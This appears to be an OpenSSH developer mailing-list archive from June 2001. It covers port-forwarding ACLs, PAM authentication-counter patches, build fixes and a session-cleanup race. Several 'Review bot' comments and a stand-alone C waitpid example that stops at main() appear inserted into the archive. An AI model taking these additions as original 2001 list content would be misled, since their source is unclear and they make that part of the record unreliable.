From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Tue, 26 Jun 2001 06:59:00 +0200 Subject: ServerSide ACLs for -L type port forwarding In-Reply-To: <20010625114945.A31324@loudcloud.com>; from reza@loudcloud.com on Mon, Jun 25, 2001 at 11:49:45AM -0700 References: <20010625114945.A31324@loudcloud.com> Message-ID: <20010626065900.A13585@folly> sshd(8) permitopen="host:port" Limit local ``ssh -L'' port forwarding such that it may only connect to the specified host and port. Multiple permitopen options may be applied separated by commas. No pattern matching is performed on the specified hostnames, they must be literal domains or addresses. On Mon, Jun 25, 2001 at 11:49:45AM -0700, Reza Naima wrote: > I have a need to add some server-side ACL functionality to the way ssh > handles port forwarding. For a first pass, I want to be able to > restrict -L port forwarding to localhost on the server only and I want > to be able to specify the ports on Server. > > I was wondering if there would be any desire to incorporate said changes > back into the main development tree? If so, are there coding guidelines > available somewhere? > > Thanks, > Reza > > p.s. I haven't yet subscribed to the list, so please Cc me with any > replies > > -- > /"\ > \ / ASCII Ribbon Campaign > X Against HTML Mail > / \ and Postings From tomh at po.crl.go.jp Tue Jun 26 19:42:38 2001 
From: tomh at po.crl.go.jp (Tom Holroyd) Date: Tue, 26 Jun 2001 18:42:38 +0900 (JST) Subject: Update of SRP patch Message-ID: I have uploaded a new release of the OpenSSH (portable) SRP patch. This version is vs. the 20010625 openssh_cvs; there are no other changes. You can find it here: http://members.tripod.com/professor_tom/archives/ http://members.tripod.com/professor_tom/archives/OpenSSH-srp9.tar.bz2 http://members.tripod.com/professor_tom/archives/OpenSSH-srp9.patch.bz2 The tarball is the whole thing with the patch applied. There are also .gz files in that directory. Tripod makes you left click on .gz files but it doesn't recognize .bz2 so you can (must) right click... The sig of the OpenSSH-srp9.tar file (note not compressed) is: -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iEYEABECAAYFAjs4V1MACgkQiGAp74wl3UP85wCfeDI2P1BTmNxQtVVcUQNWxW8O Oa0AniBGLYWpESaB/oS+W0mqv6FF6lKQ =i6x6 -----END PGP SIGNATURE----- Dr. Tom Holroyd "I am, as I said, inspired by the biological phenomena in which chemical forces are used in repetitious fashion to produce all kinds of weird effects (one of which is the author)." -- Richard Feynman, _There's Plenty of Room at the Bottom_ From CLAD at chevron.com Wed Jun 27 03:41:58 2001 From: CLAD at chevron.com (Ladner, Eric (CLAD)) Date: Tue, 26 Jun 2001 12:41:58 -0500 Subject: OpenSSH 2.9p2 configure doesn't find libz in /usr/local/lib Message-ID: <8F88657F29DFD11189ED0008C728C6B006E01D71@chevron.com> Running configure on OpenSSH 2.9p2 doesn't find libz.XX if it is located in /usr/local/lib. Thanks, Eric From stevev at darkwing.uoregon.edu Wed Jun 27 03:46:15 2001 
From: stevev at darkwing.uoregon.edu (Steve VanDevender) Date: Tue, 26 Jun 2001 10:46:15 -0700 Subject: OpenSSH 2.9p2 configure doesn't find libz in /usr/local/lib In-Reply-To: <8F88657F29DFD11189ED0008C728C6B006E01D71@chevron.com> References: <8F88657F29DFD11189ED0008C728C6B006E01D71@chevron.com> Message-ID: <15160.51815.938349.107315@darkwing.uoregon.edu> Ladner, Eric (CLAD) writes: > Running configure on OpenSSH 2.9p2 doesn't find libz.XX if it is > located in /usr/local/lib. That's highly compiler-dependent. GCC will find libraries in /usr/local/lib and include files in /usr/local/include by default. Many vendor compilers won't. If you are using some vendor-supplied compiler, add the appropriate flags to tell it to search /usr/local/include and /usr/local/lib. For example, in Digital UNIX I use CC="cc -I/usr/local/include -L/usr/local/lib" ... ./configure ... when configuring OpenSSH. From CLAD at chevron.com Wed Jun 27 05:07:18 2001 From: CLAD at chevron.com (Ladner, Eric (CLAD)) Date: Tue, 26 Jun 2001 14:07:18 -0500 Subject: OpenSSH 2.9p2 configure doesn't find libz in /usr/local/lib Message-ID: <8F88657F29DFD11189ED0008C728C6B006E01D7D@chevron.com> D'oh! I had a bad value for LDFLAGS that was already defined in the environment. Nothing to see here.. Move along.. Thanks, Eric -----Original Message----- 
From: Steve VanDevender [mailto:stevev at darkwing.uoregon.edu] Sent: Tuesday, June 26, 2001 12:46 PM To: openssh-unix-dev at mindrot.org Subject: OpenSSH 2.9p2 configure doesn't find libz in /usr/local/lib Ladner, Eric (CLAD) writes: > Running configure on OpenSSH 2.9p2 doesn't find libz.XX if it is > located in /usr/local/lib. That's highly compiler-dependent. GCC will find libraries in /usr/local/lib and include files in /usr/local/include by default. Many vendor compilers won't. If you are using some vendor-supplied compiler, add the appropriate flags to tell it to search /usr/local/include and /usr/local/lib. For example, in Digital UNIX I use CC="cc -I/usr/local/include -L/usr/local/lib" ... ./configure ... when configuring OpenSSH. From matthewm at webcentral.com.au Wed Jun 27 09:59:37 2001 
From: matthewm at webcentral.com.au (Matthew Melvin) Date: Wed, 27 Jun 2001 09:59:37 +1000 (EST) Subject: OpenSSH 2.9p2 with PAMAuthenticationViaKbdInt Message-ID: When using PAM to do password authentication the attempt/failure counter appears to be getting confused. This is using a rh62 system with the openssh-2.9p2-1 rpms... On the client side... [matthewm at toadhall (7) matthewm]$ grep Auth /etc/ssh/ssh_config RhostsAuthentication no RhostsRSAAuthentication no HostbasedAuthentication no RSAAuthentication no PubkeyAuthentication yes PasswordAuthentication yes ChallengeResponseAuthentication no KbdInteractiveAuthentication yes PreferredAuthentications publickey,keyboard-interactive,password [matthewm at toadhall (7) matthewm]$ ssh -v localhost OpenSSH_2.9p2, SSH protocols 1.5/2.0, OpenSSL 0x0090581f [...] debug1: Connecting to localhost [127.0.0.1] port 22. [...] debug1: Connection established. [...] debug1: Remote protocol version 1.99, remote software version OpenSSH_2.9p2 debug1: match: OpenSSH_2.9p2 pat ^OpenSSH Enabling compatibility mode for protocol 2.0 debug1: Local version string SSH-2.0-OpenSSH_2.9p2 debug1: SSH2_MSG_KEXINIT sent debug1: SSH2_MSG_KEXINIT received [...] debug1: done: ssh_kex2. 
debug1: send SSH2_MSG_SERVICE_REQUEST debug1: service_accept: ssh-userauth debug1: got SSH2_MSG_SERVICE_ACCEPT debug1: authentications that can continue: publickey,keyboard-interactive debug1: next auth method to try is publickey debug1: userauth_pubkey_agent: testing agent key /home/matthewm/.ssh/id_dsa debug1: authentications that can continue: publickey,keyboard-interactive debug1: try privkey: /home/matthewm/.ssh/identity debug1: try pubkey: /home/matthewm/.ssh/id_dsa debug1: authentications that can continue: publickey,keyboard-interactive debug1: try privkey: /home/matthewm/.ssh/id_rsa debug1: next auth method to try is keyboard-interactive Password: debug1: authentications that can continue: publickey,keyboard-interactive Password: Received disconnect from 127.0.0.1: 2: too many failed userauth_requests debug1: Calling cleanup 0x8061918(0x0) [matthewm at toadhall (7) matthewm]$ ... and on the server side for the same session... [root at toadhall (19) ssh]# grep Auth /etc/ssh/sshd_config RhostsAuthentication no RhostsRSAAuthentication no HostbasedAuthentication no RSAAuthentication yes PubkeyAuthentication yes PasswordAuthentication no ChallengeResponseAuthentication no KbdInteractiveAuthentication yes PAMAuthenticationViaKbdInt yes [root at toadhall (19) ssh]# sshd -ddd debug1: Seeding random number generator debug1: sshd version OpenSSH_2.9p2 [...] Connection from 127.0.0.1 port 2911 debug1: Client protocol version 2.0; client software version OpenSSH_2.9p2 debug1: match: OpenSSH_2.9p2 pat ^OpenSSH Enabling compatibility mode for protocol 2.0 debug1: Local version string SSH-1.99-OpenSSH_2.9p2 debug1: Rhosts Authentication disabled, originating port not trusted. debug1: list_hostkey_types: ssh-rsa,ssh-dss debug1: SSH2_MSG_KEXINIT sent debug1: SSH2_MSG_KEXINIT received [...] 
debug1: KEX done debug1: userauth-request for user matthewm service ssh-connection method none debug1: attempt 0 failures 0 debug2: input_userauth_request: setting up authctxt for matthewm debug1: Starting up PAM with username "matthewm" debug3: Trying to reverse map address 127.0.0.1. debug1: PAM setting rhost to "localhost" debug2: input_userauth_request: try method none Failed none for matthewm from 127.0.0.1 port 2911 ssh2 debug1: userauth-request for user matthewm service ssh-connection method publickey debug1: attempt 1 failures 1 debug2: input_userauth_request: try method publickey debug1: test whether pkalg/pkblob are acceptable debug1: temporarily_use_uid: 500/500 (e=0) debug1: restore_uid debug2: userauth_pubkey: authenticated 0 pkalg ssh-dss Failed publickey for matthewm from 127.0.0.1 port 2911 ssh2 debug1: userauth-request for user matthewm service ssh-connection method publickey debug1: attempt 2 failures 2 debug2: input_userauth_request: try method publickey debug1: test whether pkalg/pkblob are acceptable debug1: temporarily_use_uid: 500/500 (e=0) debug1: restore_uid debug2: userauth_pubkey: authenticated 0 pkalg ssh-dss Failed publickey for matthewm from 127.0.0.1 port 2911 ssh2 debug1: userauth-request for user matthewm service ssh-connection method keyboard-interactive debug1: attempt 3 failures 3 debug2: input_userauth_request: try method keyboard-interactive debug1: keyboard-interactive language devs debug1: got 1 responses Failed keyboard-interactive for matthewm from 127.0.0.1 port 2911 ssh2 debug1: userauth-request for user matthewm service ssh-connection method keyboard-interactive debug1: attempt 5 failures 4 debug2: input_userauth_request: try method keyboard-interactive debug1: keyboard-interactive language devs Disconnecting: too many failed userauth_requests debug1: Calling cleanup 0x8051e50(0x0) debug1: Calling cleanup 0x8065218(0x0) [root at toadhall (19) ssh]# So for one incorrect password the attempt/failure count goes from... 
debug1: attempt 3 failures 3 ... to... debug1: attempt 5 failures 4 ... and the session is disconnected after entering the second password regardless of whether it is the correct password or not. Also it is disconnecting because of too many requests not too many failures which doesn't seem right does it? Looking at the source it seems authctxt->attempt++ is being incremented twice, once in auth2.c:input_userauth_request() and again in auth2-pam.c:input_userauth_info_response_pam(). Attached is a patch that fixed these symptoms for me. Attempt/failure are incremented one at a time, the last password prompt is no longer ignored, and the client is only disconnected after 6 (AUTH_FAIL_MAX) failures not after 6 attempts. I am not completely certain this behaviour matches the original intent so YMMV... M. -- WebCentral Pty Ltd Australia's #1 Internet Web Hosting Company Level 1, 96 Lytton Road. Network Operations - Systems Engineer PO Box 4169, East Brisbane. phone: +61 7 3249 2500 Queensland, Australia. pgp key id: 0x900E515F -------------- next part -------------- --- auth2-pam.c.orig Wed Jun 27 09:43:43 2001 +++ auth2-pam.c Wed Jun 27 09:44:54 2001 @@ -137,8 +137,8 @@ if (authctxt == NULL) fatal("input_userauth_info_response_pam: no authentication context"); - if (authctxt->attempt++ >= AUTH_FAIL_MAX) - packet_disconnect("too many failed userauth_requests"); + if (authctxt->failures >= AUTH_FAIL_MAX) + packet_disconnect(AUTH_FAIL_MSG, authctxt->user); nresp = packet_get_int(); /* Number of responses. */ debug("got %d responses", nresp); From cls at radiate.com Wed Jun 27 10:46:35 2001 
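Review bot: the replacement test in input_userauth_info_response_pam re-implements a limit that is enforced elsewhere; the report itself locates the first `attempt++` in auth2.c:input_userauth_request(), and the failure limit is applied after each method in userauth_finish, so the cleaner change is to delete the test from this function rather than switch it from `attempt` to `failures`. The new `packet_disconnect(AUTH_FAIL_MSG, authctxt->user)` line also relies on AUTH_FAIL_MSG, which does not appear anywhere in the context shown; confirm it is defined in a header auth2-pam.c includes, otherwise the patched file does not compile.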
From: cls at radiate.com (Chris Seawood) Date: Tue, 26 Jun 2001 17:46:35 -0700 Subject: SSH connection hanging on logout References: <20010521004748.5408.qmail@wizard.math.ualberta.ca> Message-ID: <3B392CEB.9000300@radiate.com> John Bowman wrote: > >The patch has been subjected to exhaustive testing. Unless someone reports >a case where it fails before the next release, please go ahead and include >it in the next Linux version of OpenSSH. (If you don't like the -S option >for some reason, you can always remove it and the sleep config option). > John, Thanks for providing the patch. I've been using it for a couple of weeks now without any problems. Well, with one tiny problem that just seemed to pop up today. If I use agent forwarding, then the patch doesn't prevent the hang problem. Have you run across this problem? - cls From djm at mindrot.org Wed Jun 27 15:00:24 2001 
From: djm at mindrot.org (Damien Miller) Date: Wed, 27 Jun 2001 15:00:24 +1000 (EST) Subject: OpenSSH 2.9p2 with PAMAuthenticationViaKbdInt In-Reply-To: Message-ID: On Wed, 27 Jun 2001, Matthew Melvin wrote: > When using PAM to do password authentication the attempt/failure counter > appears to be getting confused. This is using a rh62 system with the > openssh-2.9p2-1 rpms... [snip] > So for one incorrect password the attempt/failure count goes from... > > debug1: attempt 3 failures 3 > > ... to... > > debug1: attempt 5 failures 4 > > Looking at the source it seems authctxt->attempt++ is being incremented > twice, once in auth2.c:input_userauth_request() and again in > auth2-pam.c:input_userauth_info_response_pam(). > > Attached is a patch that fixed these symptoms for me. Attempt/failure are > incremented one at a time, the last password prompt is no longer ignored, and > the client is only disconnected after 6 (AUTH_FAIL_MAX) failures not after 6 > attempts. I am not completely certain this behaviour matches the original > intent so YMMV... I don't think the test is necessary at all, as the checking is done in userauth_finish anyway. How does this patch go? Index: auth2-pam.c =================================================================== RCS file: /var/cvs/openssh/auth2-pam.c,v retrieving revision 1.10 diff -u -r1.10 auth2-pam.c --- auth2-pam.c 2001/02/16 02:03:04 1.10 +++ auth2-pam.c 2001/06/27 04:59:59 @@ -137,9 +137,6 @@ if (authctxt == NULL) fatal("input_userauth_info_response_pam: no authentication context"); - if (authctxt->attempt++ >= AUTH_FAIL_MAX) - packet_disconnect("too many failed userauth_requests"); - nresp = packet_get_int(); /* Number of responses. */ debug("got %d responses", nresp); -d -- | Damien Miller \ ``E-mail attachments are the poor man's | http://www.mindrot.org / distributed filesystem'' - Dan Geer From matthewm at webcentral.com.au Wed Jun 27 15:30:02 2001 
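Review bot: deleting the `attempt++` test is the right fix for the double count, since it was the second increment per userauth request; the one thing to verify before committing is that every path out of input_userauth_info_response_pam ends in userauth_finish, because after this hunk nothing inside the PAM response handler bounds the number of keyboard-interactive answers a client may send, and the failure counter alone must do that job.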
From: matthewm at webcentral.com.au (Matthew Melvin) Date: Wed, 27 Jun 2001 15:30:02 +1000 (EST) Subject: OpenSSH 2.9p2 with PAMAuthenticationViaKbdInt In-Reply-To: Message-ID: On Wed, 27 Jun 2001 at 3:00pm (+1000), Damien Miller wrote: > On Wed, 27 Jun 2001, Matthew Melvin wrote: > > > When using PAM to do password authentication the attempt/failure counter > > appears to be getting confused. This is using a rh62 system with the > > openssh-2.9p2-1 rpms... > > [snip] > > > So for one incorrect password the attempt/failure count goes from... > > > > debug1: attempt 3 failures 3 > > > > ... to... > > > > debug1: attempt 5 failures 4 > > > > Looking at the source it seems authctxt->attempt++ is being incremented > > twice, once in auth2.c:input_userauth_request() and again in > > auth2-pam.c:input_userauth_info_response_pam(). > > > > Attached is a patch that fixed these symptoms for me. Attempt/failure are > > incremented one at a time, the last password prompt is no longer ignored, and > > the client is only disconnected after 6 (AUTH_FAIL_MAX) failures not after 6 > > attempts. I am not completely certain this behaviour matches the original > > intent so YMMV... > > I don't think the test is necessary at all, as the checking is done in > userauth_finish anyway. How does this patch go? > Hmm.. okay I've just rebuilt with this new patch and tried the same tests. It seems like removing the test all together does have the desired effect. M. -- WebCentral Pty Ltd Australia's #1 Internet Web Hosting Company Level 1, 96 Lytton Road. Network Operations - Systems Engineer PO Box 4169, East Brisbane. phone: +61 7 3249 2500 Queensland, Australia. pgp key id: 0x900E515F From tomh at po.crl.go.jp Wed Jun 27 18:03:24 2001 
From: tomh at po.crl.go.jp (Tom Holroyd) Date: Wed, 27 Jun 2001 17:03:24 +0900 (JST) Subject: two GCC-3.0 warnings Message-ID: In openssh_cvs/openbsd-compat: readpassphrase.c: In function `readpassphrase': readpassphrase.c:116: warning: operation on `ch' may be undefined The offending line is: ch = ch &= 0x7f; probably should be: ch &= 0x7f; In openssh-2.9p2: readpass.c: In function `read_passphrase': readpass.c:120: warning: passing arg 2 of `ssh_askpass' discards qualifiers from pointer target type It seems to have shut up about the sftp-* printf format warnings. Seems to work OK... From scrosby at belcan.com Thu Jun 28 03:48:43 2001 From: scrosby at belcan.com (Scott Crosby) Date: Wed, 27 Jun 2001 13:48:43 -0400 Subject: OpenSSH, Cygwin, eXceed, and SIGINT Message-ID: <2DC4449D1872D311916600105AA0A2FD01DDF316@imaptech.belcan.com> All, When logging into an HP-UX 10.2 system from a Windows NT machine running Cygwin and openssh 2.9p2, control-c sends a sigint to the ssh client on the NT system, thus killing the ssh process. Interestingly enough, this behavior is only observed when using X11 forwarding. I can eliminate the behavior by changing clientloop.c to ignore SIGINT (signal(SIGINT, SIG_IGN) ) but then I'm back to the old behavior of the remote shell ignoring SIGINT. Any suggestions? Scott From gert at greenie.muc.de Thu Jun 28 07:36:27 2001 
From: gert at greenie.muc.de (Gert Doering) Date: Wed, 27 Jun 2001 23:36:27 +0200 Subject: OpenSSH, Cygwin, eXceed, and SIGINT In-Reply-To: <2DC4449D1872D311916600105AA0A2FD01DDF316@imaptech.belcan.com>; from Scott Crosby on Wed, Jun 27, 2001 at 01:48:43PM -0400 References: <2DC4449D1872D311916600105AA0A2FD01DDF316@imaptech.belcan.com> Message-ID: <20010627233627.D20011@greenie.muc.de> Hi, On Wed, Jun 27, 2001 at 01:48:43PM -0400, Scott Crosby wrote: > When logging into an HP-UX 10.2 system from a Windows NT machine > running Cygwin and openssh 2.9p2, control-c sends a sigint to the ssh client > on the NT system, thus killing the ssh process. Interestingly enough, this > behavior is only observed when using X11 forwarding. I can eliminate the > behavior by changing clientloop.c to ignore SIGINT (signal(SIGINT, SIG_IGN) > ) but then I'm back to the old behavior of the remote shell ignoring SIGINT. If the client were running on a unix machine, I'd say that the "ISIG" and/or "ICANON" flags of the tty control structure are not cleared (thus making the local terminal handler interpret ctrl-c and generate a SIGINT). As this is Cygwin, I have no idea, never used this, and I have no idea whether they have POSIX tty "things" (POSIX termios structure, and underlying logic). gert -- USENET is *not* the non-clickable part of WWW! //www.muc.de/~gert/ Gert Doering - Munich, Germany gert at greenie.muc.de fax: +49-89-35655025 gert.doering at physik.tu-muenchen.de From mouring at etoh.eviladmin.org Thu Jun 28 08:26:26 2001 
From: mouring at etoh.eviladmin.org (mouring at etoh.eviladmin.org) Date: Wed, 27 Jun 2001 17:26:26 -0500 (CDT) Subject: A one line modification to fix contrib/solaris/postinstall.in In-Reply-To: <20010627181316.N24756@newbabe.mengwong.com> Message-ID: It's been discussed and key generation really should be put in the sshd startup script. However, neither I nor anyone has had the time to modify the solaris scripts to do so. I still would like to see a full rewrite of solaris/ without all the hard coded crap. - Ben On Wed, 27 Jun 2001, Roman Gollent wrote: > Gentlefolk, > > You may wish to add > > CONFDIR="${BASEDIR}/etc" > > to the beginning of postinstall.in to fix the problem where > files going into */etc are not copied properly when the > generated package is being added via jumpstart. > > There are still outstanding issues with key generation > during jumpstart which I might be able to address without > having to resort to an external script but that will > probably involve all kinds of ugliness (like ensuring > openSSL is installed first and that LD_LIBRARY_PATH is set > to point at it). At the very least, all the files will be > copied into the correct location with the above addition. > > Best Regards, > Roman > > From nakaji at tutrp.tut.ac.jp Thu Jun 28 11:33:48 2001 
From: nakaji at tutrp.tut.ac.jp (NAKAJI Hiroyuki) Date: 28 Jun 2001 10:33:48 +0900 Subject: `_POSIX_VDISABLE' undeclared Message-ID: <877kxxwfpf.fsf@boggy.acest.tutrp.tut.ac.jp> Dear developers, I'm using OpenSSH_2.9p1 with prngd on my Sony NEWS-OS 4.2.1R. NEWS-OS 4.x is based on 4.3BSD and lacks many POSIX and ANSI features. Today I tried to make the latest openssh_cvs and got the following error, gcc -g -O2 -Wall -O -I. -I.. -I. -I./.. -I/usr/local/ssl/include -DHAVE_CONFIG_H -c readpassphrase.c readpassphrase.c: In function `readpassphrase': readpassphrase.c:89: `_POSIX_VDISABLE' undeclared (first use this function) readpassphrase.c:89: (Each undeclared identifier is reported only once readpassphrase.c:89: for each function it appears in.) readpassphrase.c:54: warning: `status' might be used uninitialized in this function gmake[1]: *** [readpassphrase.o] Error 1 Any help is appreciated. Thanks. P.S. I configured with '--with-cflags="-O"' but CFLAGS is set "-g -O2 -Wall -O". This should be fixed, too. -- NAKAJI Hiroyuki From mouring at etoh.eviladmin.org Thu Jun 28 13:33:01 2001 
From: mouring at etoh.eviladmin.org (mouring at etoh.eviladmin.org) Date: Wed, 27 Jun 2001 22:33:01 -0500 (CDT) Subject: `_POSIX_VDISABLE' undeclared In-Reply-To: <877kxxwfpf.fsf@boggy.acest.tutrp.tut.ac.jp> Message-ID: On 28 Jun 2001, NAKAJI Hiroyuki wrote: > Dear developers, > > I'm using OpenSSH_2.9p1 with prngd on my Sony NEWS-OS 4.2.1R. > NEWS-OS 4.x is based on 4.3BSD and lacks many POSIX and ANSI features. > > Today I tried to make the latest openssh_cvs and got the following error, > > gcc -g -O2 -Wall -O -I. -I.. -I. -I./.. -I/usr/local/ssl/include -DHAVE_CONFIG_H -c readpassphrase.c > readpassphrase.c: In function `readpassphrase': > readpassphrase.c:89: `_POSIX_VDISABLE' undeclared (first use this function) > readpassphrase.c:89: (Each undeclared identifier is reported only once > readpassphrase.c:89: for each function it appears in.) > readpassphrase.c:54: warning: `status' might be used uninitialized in this function > gmake[1]: *** [readpassphrase.o] Error 1 > Will the attached patch fix the problem? It's very much untested (I'll fire my NeXT box up this weekend for OpenSSH -head testing), but as long as VSTATUS is not set. Then it's safe to wrap the whole _POSIX_VDISABLE stuff around #ifdef and ignore it on those platforms. Not stating it's the best solution. =) But I think it is more correct than defining _POSIX_VDISABLE if it does not exist. But it may not be a bad idea to unset VSTATUS if _POSIX_VDISABLE does not exist just to ensure. - Ben Index: readpassphrase.c =================================================================== RCS file: /var/cvs/openssh/openbsd-compat/readpassphrase.c,v retrieving revision 1.2 diff -u -r1.2 readpassphrase.c --- readpassphrase.c 2001/06/27 13:26:39 1.2 +++ readpassphrase.c 2001/06/28 03:45:20 @@ -51,7 +51,9 @@ { struct termios term; char ch, *p, *end; +#ifdef _POSIX_VDISABLE u_char status; +#endif int echo, input, output; sigset_t oset, nset; 
@@ -86,7 +88,9 @@ /* Turn off echo if possible. */ echo = 0; +#ifdef _POSIX_VDISABLE status = _POSIX_VDISABLE; +#endif if (tcgetattr(input, &term) == 0) { if (!(flags & RPP_ECHO_ON) && (term.c_lflag & ECHO)) { echo = 1; @@ -124,7 +128,11 @@ } } *p = '\0'; +#ifdef _POSIX_VDISABLE if (echo || status != _POSIX_VDISABLE) { +#else + if (echo) { +#endif if (echo) { (void)write(output, "\n", 1); term.c_lflag |= ECHO; From Lutz.Jaenicke at aet.TU-Cottbus.DE Thu Jun 28 20:04:28 2001 
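Review bot: the three hunks guard the declaration, the initialisation and the final comparison of `status`, but not the place between them where `status` is read back from the terminal (the VSTATUS handling the message itself refers to); unless that assignment is wrapped in the same `#ifdef _POSIX_VDISABLE`, the file still fails to compile on NEWS-OS, now because `status` is undeclared rather than because `_POSIX_VDISABLE` is. In the third hunk the `#else` branch `if (echo) {` is immediately followed by the original inner `if (echo)`, which is harmless but redundant; either keep the inner test only or add a comment saying the outer one exists to keep the brace structure identical across both branches.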
From: Lutz.Jaenicke at aet.TU-Cottbus.DE (Lutz Jaenicke) Date: Thu, 28 Jun 2001 12:04:28 +0200 Subject: [Lutz.Jaenicke@aet.TU-Cottbus.DE: 2.9p1: HP-UX 10.20 utmp/wtmp handling broken?] In-Reply-To: <20010623000306.A14300@folly>; from markus.friedl@informatik.uni-erlangen.de on Sat, Jun 23, 2001 at 12:03:06AM +0200 References: <20010620102051.A1595@ws01.aet.tu-cottbus.de> <20010620154926.A8991@faui02.informatik.uni-erlangen.de> <20010620180845.A18250@ws01.aet.tu-cottbus.de> <20010621054326.A17059@folly> <20010621151214.A27941@ws01.aet.tu-cottbus.de> <20010623000306.A14300@folly> Message-ID: <20010628120427.B8752@ws01.aet.tu-cottbus.de> On Sat, Jun 23, 2001 at 12:03:06AM +0200, Markus Friedl wrote: > i get this on openbsd-current: > > Connection closed by remote host. > debug1: channel_free: channel 0: server-session, nchannels 1 > debug3: channel_free: status: The following connections are open: > #0 server-session (t4 r0 i1/0 o16/0 fd 4/3) > > debug1: channel_free: channel 0: dettaching channel user > debug1: session_by_channel: session 0 channel 0 > debug1: session_close_by_channel: channel 0 kill 5870 > debug1: Received SIGCHLD. > debug3: channel_close_fds: channel 0: r 4 w 3 e -1 > debug1: session_by_pid: pid 5870 > debug1: session_close: session 0 pid 5870 > debug1: session_pty_cleanup: session 0 release /dev/ttyqc > Closing connection to 127.0.0.1 Today I found some time to fire up DDD against the latest CVS version: * The problem still persists in normal operation. -------------------------------------------------------------------------- Connection closed by remote host. 
debug1: channel_free: channel 0: server-session, nchannels 2 debug3: channel_free: status: The following connections are open: #0 server-session (t4 r0 i1/0 o16/0 fd 7/3) debug1: channel_free: channel 0: dettaching channel user debug1: session_by_channel: session 0 channel 0 debug1: session_close_by_channel: channel 0 kill 8599 debug3: channel_close_fds: channel 0: r 7 w 3 e -1 debug1: channel_free: channel 1: X11 inet listener, nchannels 1 debug3: channel_free: status: The following connections are open: debug3: channel_close_fds: channel 1: r 8 w 8 e -1 Closing connection to 141.43.132.151 -------------------------------------------------------------------------- * The problem does not appear when stepping through the code. -> This immediately brings up the idea of a race condition. session_by_pid is called, when SIGCHLD has been received and is detected at the end of serverloop2(). Due to the WNOHANG flag, if SIGCHLD was not yet received after channel_free_all() was finished, the exiting of the child won't be noted and session_close_by_pid() will never be called (for that child). For test purposes, I have extended the code by a "sleep(1)" and now session_close_by_pid() is properly called: channel_free_all(); #start inserted by Lutz sleep(1); #end inserted by Lutz signal(SIGCHLD, SIG_DFL); while ((pid = waitpid(-1, &status, WNOHANG)) > 0) session_close_by_pid(pid, status); -------------------------------------------------------------------------- Connection closed by remote host. 
debug1: channel_free: channel 0: server-session, nchannels 2 debug3: channel_free: status: The following connections are open: #0 server-session (t4 r0 i1/0 o16/0 fd 7/3) debug1: channel_free: channel 0: dettaching channel user debug1: session_by_channel: session 0 channel 0 debug1: session_close_by_channel: channel 0 kill 8729 debug3: channel_close_fds: channel 0: r 7 w 3 e -1 debug1: channel_free: channel 1: X11 inet listener, nchannels 1 debug3: channel_free: status: The following connections are open: debug3: channel_close_fds: channel 1: r 8 w 8 e -1 debug1: Received SIGCHLD. debug1: session_by_pid: pid 8729 debug1: session_close: session 0 pid 8729 debug1: session_pty_cleanup: session 0 release /dev/pts/9 Closing connection to 141.43.132.151 -------------------------------------------------------------------------- That leaves the question about a "cleaner" solution to this effect. After first sending the bug report, I received private mails indicating, that this effect has also been seen on Linux, so it is not a pure HP-problem. As session_close_by_channel() kill()s the child with either TERM or HUP, the child has the opportunity to perform some cleanup before exit, so it is well possible that there is a delay causing the problem. (I use tcsh to see this effect, for what it's worth.) Best regards, Lutz -- Lutz Jaenicke Lutz.Jaenicke at aet.TU-Cottbus.DE BTU Cottbus http://www.aet.TU-Cottbus.DE/personen/jaenicke/ Lehrstuhl Allgemeine Elektrotechnik Tel. +49 355 69-4129 Universitaetsplatz 3-4, D-03044 Cottbus Fax. +49 355 69-4153 From scrosby at belcan.com Thu Jun 28 23:31:10 2001 
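The race Lutz describes above, reproduced in a stand-alone program (an added example, not OpenSSH code): a kill()ed child that still needs a moment for its logout cleanup is missed by an immediate waitpid(-1, WNOHANG) loop, while waiting on the pid the server already knows it signalled collects it reliably. The bounded poll instead of a blocking waitpid is this example's own choice, so a child that ignores SIGTERM cannot hang the server; the names reap_exited_now, reap_known_child and spawn_slow_child are this example's, and the child is a constructed stand-in for the login shell.

```c
#include <errno.h>
#include <signal.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

static void sleep_ms(int ms)
{
    struct timespec ts = { ms / 1000, (long)(ms % 1000) * 1000000L };
    nanosleep(&ts, NULL);
}

/* The racy pattern from the end of serverloop2(): collect whatever has
 * already exited. A child that was kill()ed a moment ago but is still in
 * its cleanup is simply missed, so its session_close_by_pid() never runs.
 * Returns the number of children reaped. */
int reap_exited_now(void)
{
    int status, reaped = 0;
    while (waitpid(-1, &status, WNOHANG) > 0)
        reaped++;
    return reaped;
}

/* Race-free variant: the server knows which pid it signalled, so wait for
 * that pid. Polling with WNOHANG (example's choice) bounds the wait so a
 * child that ignores SIGTERM cannot block the server forever.
 * Returns 1 if reaped within timeout_ms, 0 if the child is still alive
 * (caller may escalate to SIGKILL), -1 on a waitpid error. */
int reap_known_child(pid_t pid, int timeout_ms, int *status_out)
{
    int waited = 0;
    for (;;) {
        pid_t r = waitpid(pid, status_out, WNOHANG);
        if (r == pid)
            return 1;
        if (r < 0 && errno != EINTR)
            return -1;
        if (waited >= timeout_ms)
            return 0;
        sleep_ms(10);
        waited += 10;
    }
}

/* Constructed stand-in for the login shell: it ignores SIGTERM (the
 * disposition is set before fork() so the child inherits it even if the
 * parent signals it immediately) and takes exit_after_ms to "clean up". */
pid_t spawn_slow_child(int exit_after_ms)
{
    void (*old)(int) = signal(SIGTERM, SIG_IGN);
    pid_t pid = fork();
    if (pid == 0) {
        sleep_ms(exit_after_ms);
        _exit(0);
    }
    signal(SIGTERM, old);
    return pid;
}

/* Scenario 1, the thread's bug: kill, then reap at once with WNOHANG and
 * nothing is collected; waiting on the known pid collects it.
 * Returns 1 when both observations hold. */
int demo_race(void)
{
    int status = 0;
    pid_t pid = spawn_slow_child(200);
    if (pid < 0)
        return -1;
    kill(pid, SIGTERM);
    int missed = (reap_exited_now() == 0);
    int fixed = (reap_known_child(pid, 2000, &status) == 1) && WIFEXITED(status);
    return missed && fixed;
}

/* Scenario 2, the failure mode a plain blocking waitpid would have: the
 * child never exits in time, the bounded wait returns 0 instead of hanging
 * and the caller escalates to SIGKILL. Returns 1 on the expected outcome. */
int demo_stuck_child(void)
{
    int status = 0;
    pid_t pid = spawn_slow_child(10000);
    if (pid < 0)
        return -1;
    kill(pid, SIGTERM);                       /* ignored by the child */
    int timed_out = (reap_known_child(pid, 100, &status) == 0);
    kill(pid, SIGKILL);
    int killed = (reap_known_child(pid, 2000, &status) == 1) && WIFSIGNALED(status);
    return timed_out && killed;
}

int main(void)
{
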